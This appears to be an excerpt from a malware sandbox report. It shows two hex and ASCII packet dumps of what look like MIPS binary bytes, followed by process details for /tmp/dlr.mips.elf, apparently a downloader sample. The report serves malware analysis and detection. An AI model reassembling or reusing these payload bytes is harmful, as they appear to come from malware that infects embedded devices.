Nov 1, 2024 15:06:20.329061031 CET356INData Raw: 24 02 00 13 ae 82 00 00 8f bf 01 14 8f b4 01 10 8f b3 01 0c 8f b2 01 08 8f b1 01 04 8f b0 01 00 03 e0 00 08 27 bd 01 18 10 a0 00 07 00 a0 20 21 8f 85 80 20 8f 99 82 78 24 a5 73 b0 03 20 f8 09 24 06 00 12 8f bc 00 10 24 02 00 12 ae 82 00 00 8f bf
Data Ascii: $' ! x$s $$''! ! $' ! $'h@ ! $($6x$8(!'$ (!x'$
Nov 1, 2024 15:06:20.334961891 CET1236INData Raw: 27 bd 01 18 8f 99 83 10 27 b0 00 21 02 00 20 21 03 20 f8 09 24 05 00 08 8f bc 00 10 27 b1 00 18 8f 99 83 10 02 20 20 21 03 20 f8 09 24 05 00 04 8f bc 00 10 27 b2 00 68 8f 99 83 10 02 40 20 21 03 20 f8 09 24 05 00 28 8f bc 00 10 24 02 00 38 8f 99
Data Ascii: ''! ! $' ! $'h@ ! $($8x(!' $ (!x'$ @(!x' $(`` !x' $6$6' $


System Behavior

Start time (UTC):14:06:18
Start date (UTC):01/11/2024
Path:/tmp/dlr.mips.elf
Arguments:/tmp/dlr.mips.elf
File size:5777432 bytes
MD5 hash:0083f1f0e77be34ad27f849842bbb00c